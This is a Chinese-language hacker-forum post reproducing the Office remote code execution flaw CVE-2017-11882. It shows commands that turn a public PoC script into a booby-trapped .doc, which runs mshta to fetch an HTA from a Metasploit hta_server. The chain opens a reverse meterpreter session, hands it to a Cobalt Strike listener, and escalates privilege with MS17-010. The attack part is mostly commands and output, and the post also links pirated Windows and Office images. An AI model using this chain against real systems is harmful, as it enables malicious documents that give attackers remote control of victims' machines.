• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

CVE-2017-11882 Office RCE 复现


JieGe

Recommended Posts

  • Members

前言

潜伏 17 年之久的Office远程代码执行漏洞(CVE-2017-11882)影响版本从 Office 2000 到当时最新的 Office 2016,攻击者可以利用漏洞以当前登录的用户的身份执行任意命令。

环境

系统 Office
Windows 7 SP1 旗舰版 Office 2016

Windows7 SP1 旗舰版迅雷下载链接:


 
 
ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/

 
 

Office 2016 迅雷下载链接:


 
 
ed2k://|file|cn_office_professional_plus_2016_x86_x64_dvd_6969182.iso|2588266496|27EEA4FE4BB13CD0ECCDFC24167F9E01|/

 
 

POC

项目地址https://github.com/Ridter/CVE-2017-11882

弹窗

直接使用 Command109b_CVE-2017-11882.py 脚本可以生成带命令的 doc Word 文件,然后受害者打开可以直接弹窗出来:Bash


 
 
python Command109b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
 
[*] Done ! output file --> test.doc

 
 
16022436788418.png

但是这样弹窗没有意义,又因为这个漏洞执行的命令是以当前登录的用户的身份,所以如果对方不是高权限用户的话,是无法直接添加管理员的,因为无法 Bypass UAC,所以得想办法上线 MSF 或者 CS,然后后期再提权。

上线 MSF

MSF IP 受害者
10.20.24.244 Windows 7 SP 1

hta 生成

hta 是 HTML 应用程序,大多数的 Windows 操作系统都支持 hta 文件执行,利用 mshta.exe 解析 .hta文件执行,这里的 .hta 文件可以是本地的也可以是可访问的远程主机上的。

Bash


 
 
msf5 > use exploit/windows/misc/hta_server
 
 
 
# 设置反向 HTTP 回连
 
msf5 exploit(windows/misc/hta_server) > set payload windows/meterpreter/reverse_http
 
payload => windows/meterpreter/reverse_http
 
 
 
msf5 exploit(windows/misc/hta_server) > set lhost 10.20.24.244
 
lhost => 10.20.24.244
 
 
 
msf5 exploit(windows/misc/hta_server) > set lport 6666
 
lport => 6666
 
 
 
msf5 exploit(windows/misc/hta_server) > exploit -j
 
[*] Exploit running as background job 0.
 
[*] Exploit completed, but no session was created.
 
 
 
[*] Started HTTP reverse handler on http://10.20.24.244:6666
 
 
 
msf5 exploit(windows/misc/hta_server) > [*] Using URL: http://0.0.0.0:8080/n8Zw0EKX.hta
 
[*] Local IP: http://10.20.24.244:8080/n8Zw0EKX.hta
 
[*] Server started.

 
 

EXP 生成

直接使用 py 脚本将想要执行的命令写入到 doc 文件中:Bash


 
 
python Command109b_CVE-2017-11882.py -c "mshta http://10.20.24.244:8080/n8Zw0EKX.hta" -o exp.doc
 
[*] Done ! output file --> exp.doc

 
 

受害者打开了 doc 文档 成功上线:

16022485769058.png

上线 CS

因为 MSF 和 CS 的会话是一个协议的,所以可以直接改上面的 payload 然后直接打到 CS 的监听器上,这样就直接上线了。

监听器

CS IP MSF IP 受害者
10.11.38.147 10.20.24.244 Windows 7 SP 1
16022488802243.png

只需要这一个普通的监听器即可

hta 生成

CS 也是自带 hta 生成的,大家应该都清楚的吧,国光这里不多说了。国光下面来讲解一下如何使用 MSF 的 payload 直接上线 CS ,直接贴命令:Bash


 
 
msf5 > use exploit/windows/misc/hta_server
 
 
 
msf5 exploit(windows/misc/hta_server) > set payload windows/meterpreter/reverse_http
 
payload => windows/meterpreter/reverse_http
 
 
 
# 这里直接填写 CS 的 监听器信息
 
msf5 exploit(windows/misc/hta_server) > set lhost 10.11.38.147
 
lhost => 10.11.38.147
 
 
 
msf5 exploit(windows/misc/hta_server) > set lport 5555
 
lport => 5555
 
 
 
msf5 exploit(windows/misc/hta_server) > exploit -j
 
[*] Exploit running as background job 0.
 
[*] Exploit completed, but no session was created.
 
 
 
[-] Handler failed to bind to 10.11.38.147:5555
 
[*] Started HTTP reverse handler on http://0.0.0.0:5555
 
msf5 exploit(windows/misc/hta_server) > [*] Using URL: http://0.0.0.0:8080/rjw00gEIB5.hta
 
[*] Local IP: http://10.20.24.244:8080/rjw00gEIB5.hta
 
[*] Server started.


EXP 生成

直接使用 py 脚本将想要执行的命令写入到 doc 文件中:Bash


 
 
python Command109b_CVE-2017-11882.py -c "mshta http://10.20.24.244:8080/rjw00gEIB5.hta" -o exp.doc
 
[*] Done ! output file --> exp.doc

 
 

受害者打开了 doc 文档 , CS 这边成功上线:

16022493171209.png

提权

当前的用户为 sec 用户,可以直接使用经典的 MS17-010 提权:

16022494122974.png

然后填写受害者的 IP 信息:

16022495696477.png

直接 GO 提权成功:

16022495923523.png  
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now